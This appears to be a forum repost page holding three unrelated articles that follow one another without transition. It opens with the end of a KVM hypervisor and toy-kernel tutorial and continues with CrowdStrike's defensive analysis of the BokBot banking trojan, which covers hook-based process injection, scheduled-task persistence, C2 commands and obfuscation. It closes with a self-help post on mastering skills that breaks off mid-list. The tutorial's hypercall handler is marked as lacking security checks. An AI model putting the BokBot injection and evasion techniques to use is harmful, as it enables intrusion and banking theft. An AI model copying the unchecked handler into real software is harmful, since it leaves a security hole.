    mov rdx, 0x00200008
    mov ecx, 0xc0000081 /* MSR_STAR */
    wrmsr

The last step is setting the flags mask:

    mov eax, 0x3f7fd5
    xor rdx, rdx
    mov ecx, 0xc0000084 /* MSR_SYSCALL_MASK */
    wrmsr

The mask is important: when the syscall instruction is invoked, the CPU will do

    rcx = rip;
    r11 = rflags;
    rflags &= ~SYSCALL_MASK;

If the mask is not set properly, the kernel will inherit the rflags set in user mode, which can cause severe security issues.

The full registration code is:

    register_syscall:
      xor rax, rax
      mov rdx, 0x00200008
      mov ecx, 0xc0000081 /* MSR_STAR */
      wrmsr

      mov eax, 0x3f7fd5
      xor rdx, rdx
      mov ecx, 0xc0000084 /* MSR_SYSCALL_MASK */
      wrmsr

      lea rdi, [rip + syscall_handler]
      mov eax, edi
      mov rdx, rdi
      shr rdx, 32
      mov ecx, 0xc0000082 /* MSR_LSTAR */
      wrmsr

Then we can safely use the syscall instruction in user mode. Now let's implement the syscall_handler:

    .globl syscall_handler, kernel_stack
    .extern do_handle_syscall
    .intel_syntax noprefix

    kernel_stack: .quad 0 /* initialize it before the first switch into user mode */
    user_stack:   .quad 0

    syscall_handler:
      mov [rip + user_stack], rsp
      mov rsp, [rip + kernel_stack]
      /* save non-callee-saved registers */
      push rdi
      push rsi
      push rdx
      push rcx
      push r8
      push r9
      push r10
      push r11

      /* the fourth argument */
      mov rcx, r10
      call do_handle_syscall

      pop r11
      pop r10
      pop r9
      pop r8
      pop rcx
      pop rdx
      pop rsi
      pop rdi
      mov rsp, [rip + user_stack]
      .byte 0x48 /* REX.W prefix, to indicate sysret is a 64-bit instruction */
      sysret

Notice that we have to properly push and pop the non-callee-saved registers. syscall/sysret do not modify the stack pointer rsp, so we have to handle it manually.

Hypercall

Sometimes our kernel needs to communicate with the hypervisor. This can be done in many ways; in my kernel I use the out/in instructions for hypercalls. We used the out instruction earlier to simply print a byte to stdout; now we extend it to do more fun things. An in/out instruction takes two arguments: 16-bit dx and 32-bit eax. I use the value of dx to indicate which hypercall is intended and eax as its argument.
I defined these hypercalls:

    #define HP_NR_MARK 0x8000
    #define NR_HP_open  (HP_NR_MARK | 0)
    #define NR_HP_read  (HP_NR_MARK | 1)
    #define NR_HP_write (HP_NR_MARK | 2)
    #define NR_HP_close (HP_NR_MARK | 3)
    #define NR_HP_lseek (HP_NR_MARK | 4)
    #define NR_HP_exit  (HP_NR_MARK | 5)
    #define NR_HP_panic (HP_NR_MARK | 0x7fff)

Then modify the hypervisor to do more than just print bytes when encountering KVM_EXIT_IO:

    while (1) {
      ioctl(vm->vcpufd, KVM_RUN, NULL);
      switch (vm->run->exit_reason) {
        /* other cases omitted */
        case KVM_EXIT_IO:
          // putchar(*(((char *)vm->run) + vm->run->io.data_offset));
          if(vm->run->io.port & HP_NR_MARK) {
            switch(vm->run->io.port) {
              case NR_HP_open: hp_handle_open(vm); break;
              /* other cases omitted */
              default: errx(1, "Invalid hypercall");
            }
          } else errx(1, "Unhandled I/O port: 0x%x", vm->run->io.port);
          break;
      }
    }

Taking open as an example, I implemented the handler of the open hypercall in the hypervisor as follows (warning: this code lacks security checks):

    /* hypervisor/hypercall.c */
    static void hp_handle_open(VM *vm) {
      static int ret = 0;
      if(vm->run->io.direction == KVM_EXIT_IO_OUT) { // out instruction
        uint32_t offset = *(uint32_t*)((uint8_t*)vm->run + vm->run->io.data_offset);
        const char *filename = (char*) vm->mem + offset;
        MAY_INIT_FD_MAP(); // initialize fd_map if it's not initialized
        int min_fd;
        for(min_fd = 0; min_fd <= MAX_FD; min_fd++)
          if(fd_map[min_fd].opening == 0) break;
        if(min_fd > MAX_FD) ret = -ENFILE;
        else {
          int fd = open(filename, O_RDONLY, 0);
          if(fd < 0) ret = -errno;
          else {
            fd_map[min_fd].real_fd = fd;
            fd_map[min_fd].opening = 1;
            ret = min_fd;
          }
        }
      } else { // in instruction
        *(uint32_t*)((uint8_t*)vm->run + vm->run->io.data_offset) = ret;
      }
    }

In the kernel we invoke the open hypercall with:

    /* kernel/hypercalls/hp_open.c */
    int hp_open(uint32_t filename_paddr) {
      int ret = 0;
      asm(
        "mov dx, %[port];"  /* hypercall number */
        "mov eax, %[data];"
        "out dx, eax;"      /* trigger hypervisor to handle the hypercall */
        "in eax, dx;"       /* get return value of the hypercall */
        "mov %[ret], eax;"
        : [ret] "=r"(ret)
        : [port] "r"(NR_HP_open), [data] "r"(filename_paddr)
        : "rax", "rdx"
      );
      return ret;
    }

Almost done

Now you should know everything needed to implement a simple Linux kernel running under KVM. Some details worth mentioning from the implementation:

execve: My kernel is able to execute a simple ELF. To do this you will need knowledge of the structure of ELF, which is too complicated to introduce here. You can refer to the Linux source for details: linux/fs/binfmt_elf.c#load_elf_binary.

memory allocator: You will need malloc/free in the kernel; try to implement a memory allocator by yourself!

paging: The kernel has to handle mmap requests from user mode, so you will need to modify the page tables at runtime. Be careful NOT to mix kernel-only addresses with user-accessible addresses.

permission checking: All arguments passed from user mode must be carefully checked. I've implemented checking methods in kernel/mm/uaccess.c. Without proper checking, user mode may be able to do arbitrary reads/writes in kernel space, which is a severe security issue.

Conclusion

This post introduced how to implement a KVM-based hypervisor and a simple Linux kernel; I hope it helps you understand KVM and Linux more clearly. I know I've omitted many details here, especially in the kernel part. Since this post is intended to be an introduction to KVM, I think this arrangement is appropriate. If you have any questions or find bugs in my code, leave a comment here or file an issue on GitHub. If this post is helpful to you, I'll be very grateful to see a 'thanks' on Twitter @david942j

Sursa: https://david942j.blogspot.com/2018/10/note-learning-kvm-implement-your-own.html
Digging into BokBot’s Core Module
January 3, 2019
Shaun Hurley and James Scalise
From The Front Lines

Introduction
BokBot first started showing up in 2017, and CrowdStrike’s Falcon® OverWatch™ and Falcon® Intelligence™ teams have analyzed these infections to ensure customers are both protected and informed. Recently, BokBot infections have become more prevalent due to Emotet campaigns that leverage BokBot as a means to go after a victim’s personal banking information. Given that BokBot is associated with the eCrime group MUMMY SPIDER, it is no surprise that the malware provides robust functionality, such as:

Command and control of a system
Process execution
Registry editing
Writing to the file system
Logging
Polymorphism and other obfuscations
Tamper proofing
Modularity
Credential theft
Intercepting proxy
Remote control via VNC

In addition, BokBot has been seen downloading and executing binary code from other malware families: for example, the Azorult infostealer. This blog post will dig into the technical details of BokBot’s main module. Subsequent blog posts will cover the additional downloaded modules.

BokBot Container Execution
BokBot comes packed inside a crypter. The crypter goes through several stages before finally unpacking the BokBot binary and injecting it into svchost.exe. Here is a quick rundown of the different stages:

Stage 1 (crypter): decodes stage 2 and executes it
Stage 2 (crypter): decodes shellcode and executes it
Stage 3 (shellcode): hollows out the base process image, decodes the core process injection PE, and overwrites the base process image with it
Stage 4 (process injection): executes the process injection code, launches an svchost.exe child process, and injects BokBot as a headless PE image into the child process

All of the behaviors relevant to the CrowdStrike® Falcon platform occur in stage 4. The primary focus of the following section is the unique method in which BokBot is injected into the child process.
Process Injection
In order to bypass antivirus (AV) detections for process hollowing, BokBot hooks several Windows API functions, executes the hooking code, and then removes the hook.

Simulating Process Hollowing
In order to simulate process hollowing, the ZwCreateUserProcess routine is hooked. BokBot calls ZwProtectVirtualMemory to modify the permissions of the routine to PAGE_READWRITE. Next, the first five opcodes (bytes) are replaced with the opcodes for a JMP <address of hooking code> instruction. Permissions are restored, and then CreateProcessA is called.

Figure 1: Hooking ZwCreateUserProcess

Once CreateProcessA is called, a function call chain leads to calling ZwCreateUserProcess and then the hooking code, as shown in Figure 1. At this point, no process has been created. The hooking code will complete the creation of the child process by removing the hook from the ZwCreateUserProcess routine, and then the unhooked ZwCreateUserProcess procedure is called. This creates the child process, but execution doesn’t begin until CreateProcessInternal returns. The rest of the hook routine will decode and inject the embedded BokBot binary into the child svchost.exe process.

Code Injection
Prior to injecting the code, the BokBot PE is decompressed and loaded into local process memory. Once loaded, the following Windows procedures are used to allocate and write to the svchost child process:

After the main BokBot module has been written to the child process, the steps to execute the BokBot code begin.

Code Execution
BokBot uses a novel technique to get the code to execute inside of the child process. Using the same APIs as earlier, the dropper hooks RtlExitUserProcess in the child process. Since svchost.exe is launched without arguments, it will terminate immediately. As the process attempts to exit, it will call the hooked RtlExitUserProcess, thus executing the BokBot payload.
Figure 2: Executing BokBot with RtlExitUserProcess Hook

There is one more task for the hooking routine to complete before CreateProcessInternalW resumes execution.

Injecting a Context Data Structure
After the BokBot payload is injected into the child process, a context data structure is written to the child process. This context contains all of the data necessary to ensure that BokBot’s main module is able to execute without issue:

Windows procedure addresses:
ntdll.ZwAllocateVirtualMemory
ntdll.ZwWriteVirtualMemory
ntdll.ZwProtectVirtualMemory
ntdll.ZwWaitForSingleObject
ntdll.LdrLoadDll
ntdll.LdrGetProcedureAddress
ntdll.RtlExitUserProcess
ntdll.ZwCreateUserProcess
ntdll.RtlDecompressBuffer
ntdll.ZwFlushInstructionCache
Load address for the payload
Path to the dropper binary
C2 URLs
Project ID

This data is collected throughout the lifetime of the dropper process. In addition, a similar structure will be written to the child processes of BokBot as it downloads and executes modules. After injection, CreateProcessInternalW resumes, and the dropper process exits. BokBot’s main module starts the initialization phase.

BokBot Initialization
Prior to executing the primary loop to communicate with the C2, BokBot goes through several initialization steps to prepare itself for C2 communication:

Remove the RtlExitUserProcess hook
Create a memory-mapped file to store logging data
Execute BokBot as the logged-on user (if the current process is running as System)
Suppress error windows
Collect system information (Windows version information, user SID, domain membership)
Generate unique IDs
Prevent multiple executions
Install BokBot on the host
Inject existing downloaded modules into child processes

Some of these steps are covered in more detail in the following sections.
Silence Errors
To prevent error windows from informing the victim of an issue, BokBot sets the error mode of the process to 0x8007, which corresponds to the following flags:

SEM_FAILCRITICALERRORS (0x0001)
SEM_NOGPFAULTERRORBOX (0x0002)
SEM_NOALIGNMENTFAULTEXCEPT (0x0004)
SEM_NOOPENFILEERRORBOX (0x8000)

This disables most error notices that are generated when a process crashes.

Generating Unique IDs
BokBot uses several unique IDs that are generated early during process execution. These values are passed to the C2 (command and control), used as a key for RC4, and passed to child processes.

Project ID
In addition to injecting the main BokBot module into svchost, the dropper also injects a chunk of binary data that provides context for BokBot to execute, including the Project ID. These unique Project ID values appear to be used to identify infections that correspond to distribution campaigns. The Project ID is a four-byte value.

Bot ID
Bot IDs are unique to specific instances for a user on an infected host. The value is used as an encryption key and as a seed in the generation of the unique values that BokBot needs for a variety of purposes, such as the generation of pseudo-random strings for file and event names. This will be discussed further in subsequent sections. The Bot ID is generated in one of the two following ways:

Security ID (SID) of the account name
System time in file time format

Since both values are 64-bit, no matter which method is used, the value is split into two 32-bit chunks and XORed.

ID Hash
In addition to the Bot ID, a simple hash is generated that can be used to verify the validity of both the Bot ID and the Project ID. This hash is generated using the Bot ID and the Project ID, in the following manner:

This value will be passed along with the Project ID and the Bot ID as part of the C2 URL parameters. If this request is invalid, infected hosts will not receive any instructions from the C2.

C2 Hostname Initialization
BokBot contains an encoded list of C2 hostnames that were provided as part of the context data structure that was injected by the dropper.
The C2 list within that structure is decoded using a key that was also provided by the context, then re-encoded using a new key generated with an rdtsc instruction, and stored as an array of pointers.

Prevent Multiple Executions
A unique global named event is generated using the Bot ID. A successful call to CreateEvent is followed by a call to GetLastError. If the malware is already executing, the last error is ERROR_ALREADY_EXISTS, and the process exits.

Installation
During installation, the BokBot dropper binary is written to an installation directory, and a scheduled task is created for persistence. The installation directory is created in the following root directory: C:\ProgramData

The installation directory name is unique and generated using the Bot ID. Once the directory is created, the original dropper file is renamed (also using the Bot ID as a seed) and written to the directory. Because the Bot ID is based on system information, using it as a seed ensures that the malware will always generate the same installation path and filename on a particular host.

After generating the installation directory name, BokBot needs to generate a filename for the BokBot binary that is going to be written to that directory. The following Python code reproduces the algorithm that BokBot uses to generate the filename and various other strings. The str_id value in the script is a hard-coded integer that is used with the Bot ID to generate consistent strings. For instance, using a Bot ID of 0x2C6205B3 and a str_id of 2 always results in ayxhmenpqgof, but switching to a str_id of 6 results in bwjncm.

The following is an example of the installation path:
C:\ProgramData\{P6A23L1G-A21G-2389-90A1-95812L5X9AB8}\ruizlfjkex.exe

A scheduled task is created to execute at Windows logon.
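The Python reproduction referenced above did not survive extraction. As a loose illustration only (this is my own construction, not BokBot's recovered algorithm, and it will not reproduce outputs such as ayxhmenpqgof), the XOR-fold that produces the Bot ID and a deterministic seed-driven name generator could look like this:

```python
import string

def fold_bot_id(value64):
    """XOR-fold a 64-bit seed (a SID-derived value or a FILETIME)
    into the 32-bit Bot ID, as the post describes."""
    return ((value64 >> 32) ^ (value64 & 0xFFFFFFFF)) & 0xFFFFFFFF

def gen_name(bot_id, str_id, length=10):
    """Hypothetical stand-in for the string generator: a small LCG
    seeded by (bot_id, str_id) emitting stable lowercase names."""
    state = (bot_id ^ (str_id * 0x9E3779B9)) & 0xFFFFFFFF
    chars = []
    for _ in range(length):
        state = (state * 1103515245 + 12345) & 0xFFFFFFFF  # LCG step
        chars.append(string.ascii_lowercase[state % 26])
    return "".join(chars)

bot_id = fold_bot_id(0x01D4A9B32C6205B3)  # hypothetical 64-bit seed
print(gen_name(bot_id, 2))  # same (bot_id, str_id) -> same name, every run
```

Because both the directory and file names derive only from the Bot ID and a per-purpose str_id, the same host always regenerates the same paths, which matches the persistence behavior described above.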
The task name is generated in the same manner as the installation directory:

Task Name: {Q6B23L1U-A32L-2389-90A1-95812L5X9AB8}
Trigger: Logon
Action: Start a program
Details: BokBot dropper path

C2 Communication
BokBot communicates with C2 servers via HTTPS requests, passing various values to the server through URL parameters and via POST data. The URL request data is not encrypted or obfuscated beyond the SSL/TLS used by the server. The following sections detail the parameters required by all requests, some additional optional parameters, and the bot registration process.

Required C2 Request/Response Parameters
Every request/response will have these parameters sent to the server. They provide the C2 with information that identifies the request/response type and uniquely identifies the infected machine. Table 1 describes these parameters in greater detail.

Table 1: Required URI Parameters

The URL path often changes between versions; for instance, versions 100-102 used /data100.php instead of /in.php.

Additional C2 Request Parameters
BokBot contains a communication thread that loops continuously until the process exits, retrieving instructions from the C2 server. These requests include several additional parameters beyond those already described, detailed in Table 2. These parameters are not sent when a machine sends the result of a command issued by the C2, such as when uploading a screenshot.

Table 2: Additional BokBot C2 Request URI Parameters

The following URL parameters showcase an example of the initial connection to the C2:

In this example, there are no web injects, no C2 URLs, and no modules have been downloaded; therefore the highlighted parameters are either zero or empty. An initial timestamp has been generated, and the version number is static.

Initial Bot Registration
A registration request is combined with the standard C2 URL parameters that are sent to the C2 with each request.
After the initial request, the C2 server will send commands back to the victim, signaling it to download web injects, updated C2 hostnames, or executable modules, or to perform other tasks. The initial registration URL contains parameters related to system information. The following string is an example:

Table 3 describes the registration URI parameters.

Table 3: Registration Request URI Parameters

The following is an example of a registration request (in red) and a response from the C2 (in blue) containing commands for the infected host:

C2 Commands
This section will cover the command requests made by the C2. Each command from the C2 takes the following format:

The following commands are available in the current version of BokBot:

Note that these command ID values may change between versions. As this list demonstrates, BokBot provides operators with a wide variety of options to interact with an infected machine.

URL Download Command Handler
Many commands trigger a command handler function that requires communication with either a C2 URL or another URL specified in the server request arguments. If specified by the request, the data downloaded from the target URL will be written to a DAT file. Whether or not the downloaded data is written to a DAT file, it will always be processed by a callback function for one of the following C2 commands:

Start a new executable module, or restart the current executable module
Update web injects (either command)
Update config
Update BokBot
Write to a file
Download and execute a binary

The commands that use the C2 URL hostnames send a d URL parameter, such as the following example:

This value is typically set to 0; the file to download is specified by the g parameters.

Modules and DAT Files
All data received from the C2 that needs to persist between reboots is written out as a DAT file on the infected machine.
These files include:

Web inject configuration
C2 configuration
External modules

Each file is encrypted and decrypted as needed by either the main module or a child module, using the Bot ID as the key. Each module is given a unique tag.

Unique Tag Generation
BokBot assigns unique tag values to injected processes, downloaded modules, and the downloaded DAT files. These tags are a convenient way for the executing BokBot process to identify external process resources. Tag generation is simple:

18 – Web injects configuration file, statically defined in the binary
19 – Reporting configuration file, statically defined in the binary
20 – C2 configuration file, statically defined in the binary
33-46 – Downloaded modules to be injected into child processes (assigned as needed in an incremental fashion; not necessarily a unique tag for what the module does)

These values come up regularly during analysis of BokBot, including as inputs to the unique filename generation described later.

Downloading DAT Files
As previously mentioned, DAT files are downloaded based on commands sent from the C2. Once the command is received from the C2, a command handler specific to that command is called to process the request. In response, the infected machine notifies the C2 with the command that it is ready to receive an RC4-encrypted blob from the C2. Figure 3 illustrates the process for commands that download configuration files and modules.

Figure 3: C2 Command to Trigger DAT File Download

An eight-byte RC4 key is prepended to the data buffer. Prior to writing the blob to a file, BokBot decrypts the file and then re-encrypts it using a new RC4 key based on the Bot ID.

Write to a File
BokBot creates a new directory under C:\ProgramData to store the DAT files. The directory name is generated using the string generation algorithm described previously. DAT file names are generated using the unique tag value.
This value is run through a string generation algorithm (also dependent on the Bot ID), which returns a unique filename for the DAT file.

Table 4: Example of BokBot DAT Files Written During Analysis

Table 4 lists all of the DAT files that were written during the testing process for this blog. In this case, the installation directory is C:\ProgramData\yyyyyyyyiu\. These DAT files are further handled based on the specified type, depending on whether it is an executable module or a data file.

Executable Module
BokBot has several executable modules that can be downloaded and injected into an svchost.exe child process. Once the relevant DAT file is decoded using RC4, no additional decoding or decompression is necessary for the executable module DAT files. The executable module header contains information necessary to identify the module:

The rest of the file contains the data necessary to load and execute the module, including the various portions of a PE file along with a custom PE header.

Module Injection and Execution
Executable modules are injected with a technique similar to the dropper's, minus the hook of ZwCreateUserProcess; the child process is started suspended (CREATE_SUSPENDED). It is a little closer to traditional process migration, with the addition of the RtlExitUserProcess hook.

PE Image Loading
Because there is no standard PE header, the DAT file has to contain all of the relevant information (virtual sizes, relocations, etc.) to properly map the binary into the child process. This data is part of the header of the DAT file. BokBot builds the binary in local process memory prior to injecting it into the child process.

Injection
Injection uses the same APIs as the dropper: ZwAllocateVirtualMemory, ZwWriteVirtualMemory, and ZwProtectVirtualMemory. After injection, the process is resumed using ResumeThread.

Execution Context Injection
Once again, an execution context structure is written to the child process prior to execution.
Some of the information contained in this context includes:

Bot ID
Project ID
C2 hostnames
A URL path format string

This keeps everything consistent between the parent and child process. No new unique identifiers need to be generated; all of the encryption keys are the same, as are the hostnames and even the URL path. Consistency between parent and child is necessary for the messages sent between the two using inter-process communication (IPC). After a module is injected into a child process, the first four bytes of the decrypted DAT file are added to an array, used by BokBot to identify which modules are currently executing.

Data Files
The other DAT files contain data necessary either to communicate with a C2 or for web injection. Essentially, these files provide whatever additional data the main BokBot process and the executable modules require to accomplish their job.

Config File
The config file contains all of the data necessary for the BokBot main module to maintain communication with the C2. Once the file is decrypted using the process-specific RC4 key, no additional decompression or decryption is necessary.

Signature Verification
Each config file comes with a digital signature block, used to verify the integrity of the C2 hostname data. The signature is verified using the signature verification method outlined in the obfuscations section. The following is an example C2 configuration, with the signature block in red:

Web Inject Files
There are multiple web inject files. One contains all of the target URL and hostname data, and the second contains regex patterns as well as the code to inject. These files are both RC4-encrypted and compressed. They are not parsed by the main BokBot binary, but rather by the intercepting proxy module. The zeus file magic is verified, a buffer is allocated, and then the files are decompressed.
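The decrypt-then-re-encrypt handling of downloaded DAT blobs described earlier (an eight-byte RC4 key prepended by the server, then re-encryption under a Bot-ID-based key) can be sketched as follows. RC4 here is the standard stream cipher; the little-endian packing of the Bot ID into a key is an assumption for illustration only.

```python
def rc4(key, data):
    """Textbook RC4 (KSA + PRGA); encryption and decryption are identical."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def reencrypt_blob(blob, bot_id):
    """Model of the DAT handling: the first 8 bytes are the server's RC4
    key; the payload is decrypted with it, then re-encrypted under a
    Bot-ID-derived key (4-byte little-endian here -- an assumption)."""
    server_key, payload = blob[:8], blob[8:]
    plaintext = rc4(server_key, payload)
    local_key = bot_id.to_bytes(4, "little")
    return rc4(local_key, plaintext)

server_key = bytes.fromhex("1122334455667788")
blob = server_key + rc4(server_key, b"config data")
stored = reencrypt_blob(blob, 0x2C6205B3)
print(rc4((0x2C6205B3).to_bytes(4, "little"), stored))  # b'config data'
```

Since RC4 is symmetric, the same function both encrypts and decrypts, which is why a stored DAT file can later be recovered with a single pass using the Bot-ID key.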
A forthcoming blog post on the proxy module will cover decompression and usage of the web injection configuration files.

Communication with Child Processes
Memory-mapped files and events are used by BokBot to communicate with all child processes that contain an injected module. By leveraging named events with CreateEvent, OpenEvent, and OpenFileMapping, the BokBot main module is able to provide additional information to these child processes.

Shared Module Log
Modules write to the same shared memory-mapped file. The memory-mapped file is created using a name shared between the parent and child processes. Each process that can generate this name can use it to open the memory-mapped file and write data to the shared module log. Further details are covered in the next section, and the specific data written will be covered in the separate module descriptions below. The main module is responsible for clearing the log and sending the data to the C2.

Module-Specific Communication
BokBot’s main module often needs to issue commands to the child processes that contain injected module code. The commands can trigger an update of module-specific data, or instruct the module to perform a specific function, such as harvesting data from Outlook. Figure 4 outlines this process, which is further explained in the subsequent sections.

Figure 4: BokBot Communication Between Parent and Child Processes

Event Name Generation
In order for the BokBot main module and the child processes to communicate with events, unique names need to be generated, and they must be consistent across all of the processes. Table 5 illustrates BokBot’s approach.

Table 5: Event Name Structure

These events will be used by the parent and child processes to exchange data.

BokBot Main Module
This process has the ability to communicate with all of the children hosting the injected modules. These communications all revolve around commands generated by the C2.
Once a command that requires notifying an executable module child process is initiated, a named Q event is opened to ensure that the child process is ready to receive the data. If this Q event does not exist, then the child process has not been started; BokBot injects the target module into a child process and loops, checking whether the event can be opened. Once the Q event has been successfully opened, BokBot creates a new named R event, creates a memory-mapped file (named M event), writes data to the file, signals the open Q event, and waits for a response from the child process. After the child clears the R event, the memory-mapped file is unmapped, and all handles are closed.

BokBot Executable Module
After initialization, the child process will create a named Q event and wait until it is signaled by the parent process. Once signaled, the named R event is opened, and the data in the memory-mapped file is processed.

Data from the BokBot Parent
BokBot’s main module writes some contextual information to the injected module, telling it to perform specific actions. These actions change based on the module receiving the data. The following commands are consistent between modules, but the actions performed may vary:

0xFF00: Process exit with a 0x1122 code
0xFF01: Check web injects or no operation
0xFF02: Update C2 hostnames

In addition to a command, any relevant data associated with the command is also processed, based on whatever instruction the command tells the injected module to accomplish. After the task assigned by the parent process has completed, the memory-mapped file is unmapped, the R event is signaled, and all other open events are closed.

Obfuscations and Tamper Proofing
BokBot uses several methods to hinder analysis:

String obfuscation
Encrypted DAT files from the server
Signature verification
Polymorphism

String Obfuscation
To make analysis more difficult, significant strings have been XOR encoded using a shifting key algorithm.
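The string structure and the Python decoder from the original post were embedded as images and are not reproduced here. As a purely illustrative sketch of the general idea (a shifting-key XOR scheme of my own construction, not the recovered BokBot routine), a decoder and a matching encoder might look like:

```python
def xor_shift_decode(buf):
    """Hypothetical shifting-key XOR decode: a 4-byte seed and a 2-byte
    length precede the ciphertext; the key mutates after every byte."""
    key = int.from_bytes(buf[:4], "little")
    length = int.from_bytes(buf[4:6], "little")
    out = bytearray()
    for b in buf[6:6 + length]:
        out.append(b ^ (key & 0xFF))
        key = ((key >> 8) | ((key & 0xFF) << 24)) ^ 0x5A  # rotate + perturb
    return bytes(out)

def xor_shift_encode(plaintext, seed):
    """Inverse helper for testing: same keystream, XOR applied forward."""
    key = seed
    out = bytearray()
    for b in plaintext:
        out.append(b ^ (key & 0xFF))
        key = ((key >> 8) | ((key & 0xFF) << 24)) ^ 0x5A
    return seed.to_bytes(4, "little") + len(plaintext).to_bytes(2, "little") + bytes(out)

print(xor_shift_decode(xor_shift_encode(b"advapi32.dll", 0xDEADBEEF)))  # b'advapi32.dll'
```

Because each byte perturbs the key, identical plaintext bytes encrypt to different ciphertext bytes, which defeats naive single-byte XOR brute forcing.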
All encoded strings have the following structure:

Here is the algorithm to decode the string (Python):

Signature Verification
Signature verification occurs under two circumstances: updated C2 URLs and an updated BokBot binary. In both cases, the process is the same. The verification function receives two things: a 128-byte signature to verify, and the data to verify. First, BokBot creates an MD5 hash of the data requiring verification. Next, an RSA public key embedded in the executing binary is imported via CryptImportKey. Once the hash is generated and the key imported, CryptVerifySignature is used to verify the signature. This may be an attempt to prevent some third party from taking over or otherwise disrupting the botnet.

Polymorphism
Every time BokBot is installed, prior to it being written to the install directory, the .text section of the binary is modified with junk data and the virtual size is updated. A new checksum is generated to replace the current checksum.

How CrowdStrike Falcon Prevent™ Stops BokBot
BokBot spawns an svchost child process, injects the main module, and that svchost process spawns and injects into multiple child processes. The process tree in Figure 5 is an example of what BokBot looks like when process blocking is disabled in Falcon Prevent. As can be seen, several malicious child processes were launched by BokBot’s main module located inside the first svchost process.

Figure 5: BokBot Process Tree Without Process Blocking Enabled

Without preventions enabled, the customer will still be notified of the malicious activity, but no action will be taken to prevent the behavior.

Suspicious Process Blocking
Falcon has the capability to prevent the execution of BokBot’s main module and all of the child modules. Turning on process blocking in Falcon Prevent kills the BokBot infection at the parent svchost process. Looking at the process tree in the Falcon UI with process blocking enabled shows an analyst that the svchost process was prevented.
The block message (see Figure 7) that accompanies this preventative action explains why the process was terminated.

Figure 6: BokBot Process Tree with Process Blocking Enabled
Figure 7: BokBot Process Block Message

Suspicious process blocking is an example of malware prevention based on behavior. If the malware uses behavior that has not been caught by Falcon’s indicators of activity, then Falcon can also prevent malware execution by leveraging either next-generation AV machine learning or intelligence collected by CrowdStrike’s Falcon Intelligence team.

In Summary
BokBot is a powerful banking trojan that provides attackers with a robust feature set. One of its more distinctive features is the method it uses to communicate with its child modules. Additional blog posts on BokBot are coming that will contain more information on the downloaded modules.

BokBot Hashes
The following hashes were used in the creation of this blog post.

MITRE ATT&CK Framework Mapping

Additional Resources
Read a Security Intelligence article: “New Banking Trojan IcedID Discovered by IBM X-Force Research.”
Read a Talos blog: “IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution.”
Visit Vitali Kremez | Ethical Hacker | Reverse Engineer and read: “Let’s Learn: Deeper Dive into ‘IcedID’/’BokBot’ Banking Malware: Part 1.”
Download the 2018 CrowdStrike Services Cyber Intrusion Casebook and read up on real-world IR investigations, with details on attacks and recommendations that can help your organization get better prepared.
Learn more about CrowdStrike’s next-gen endpoint protection by visiting the Falcon platform product page.
Test CrowdStrike next-gen AV for yourself: start your free trial of Falcon Prevent™ today.

Source: https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/
The Process of Mastering a Skill

In the first part of this mini-series, “The Paradox of Choice”, I talked about the psychology behind making choices when overloaded with information. Here I will cover the process of mastering a skill and how to put it into practice in a world full of distractions. This post is inspired by Mastery by Robert Greene and Deep Work by Cal Newport. I highly recommend reading both, as they will help you understand the process of mastering a skill or field.

Prodigy or Expert?
Have you ever wondered what separates experts from everyone else? I don’t mean the self-proclaimed “experts” who value status over learning. I mean the “geniuses” of our industry who know their field extraordinarily well and have spent decades honing their skills. How do these successful researchers master their field? Is it some natural talent they were born with, or do they have a magic trick that only a few know about?

When performance psychologists studied what distinguishes experts across several different fields, they kept coming across the same answer in each field: deliberate practice. In his 1993 paper The Role of Deliberate Practice in the Acquisition of Expert Performance, K. Anders Ericsson stated:

“We deny that these differences are immutable, that is, due to innate talent. Only a few exceptions, most notably height, are genetically prescribed. Instead, we argue that the differences between expert performers and normal adults reflect a life-long period of deliberate effort to improve performance in a specific domain.”
K. Anders Ericsson

Today we know that it’s not magic. It’s this specific form of practice. If you look at the so-called “geniuses” throughout history, time and again the common factor is not innate talent, but simply that they each put countless hours into mastering their craft long before arriving at their respective breakthroughs. Does that mean you can become the next Einstein? Yes. But not if you waste your time with unstructured learning.
If you structure your approach to learning, apply solid discipline, and rebuild your own brain’s ability to focus, you can achieve truly great things. The trick is to focus on deliberate practice rather than on practice alone. You will read about the difference between the two in the Deep Work section, or in my previous blog post on The Importance of Deep Work.

In his book The Laws of Human Nature, Greene notes that mastering a skill that matches your interests gives your brain the sense of purpose and direction that it craves. This is important when learning something new, because practice can otherwise be tedious and cognitively demanding. Clear goals let us embrace this process, knowing that the eventual reward will outweigh the sacrifice. This, in turn, makes the process more pleasant. Eventually your mind develops enough discipline to withstand distractions and becomes pleasantly absorbed in the work. This is how we achieve focus and momentum. In this state of flow your brain retains more information, and so you learn even faster.

It is easy to get overexcited and want to learn many skills all at once. I could do this, I could do that. No, you can’t. You can’t do everything at once, and you are not meant to do everything in life. Focusing on one activity should not frighten you; it should liberate you. Developing solid skills in one area lets you branch out to something else and combine different skills. If you are someone who gets easily bored, you can follow the path of doing different things, but do so by mastering each before advancing to the next.

Mastering a skill or field is challenging, but it is a fulfilling and rewarding feeling. It takes patience, dedication, and discipline. If you feel like you lack these things, don’t be discouraged. Part of the process is to develop skills like discipline and patience on your way to mastery.
Once you have mastered one skill or field, it will be much easier to move on to the next one, because you will have developed the mental muscles and the skills that make it easier for you to structure your learning and retain information more efficiently. Greene breaks this process down into three stages: “apprenticeship”, the “creative/active” phase, and finally “mastery”.

Stage 1: Apprenticeship
Apprenticeship is the stage where you learn a wide range of skills related to your chosen field. In this stage you should identify which skills are the most important to learn and prioritize them, gaining proficiency on a skill-by-skill basis. It is better to learn one skill at a time rather than trying to multitask and learn them all at once. During this stage it is okay to mirror the techniques of others and try them yourself by, for example, following online tutorials or reinventing well-known tools for yourself. But it is also important to get out of your comfort zone and not shy away from difficult problems or obstacles. Apprenticeship can be the most challenging of the three stages of mastery, but it is also the most important. So here are some things to keep in mind as you are going through this stage:

Value learning over money: During this stage, focus on mastery, not money. Be patient and remember that the eventual reward will outweigh the sacrifice.

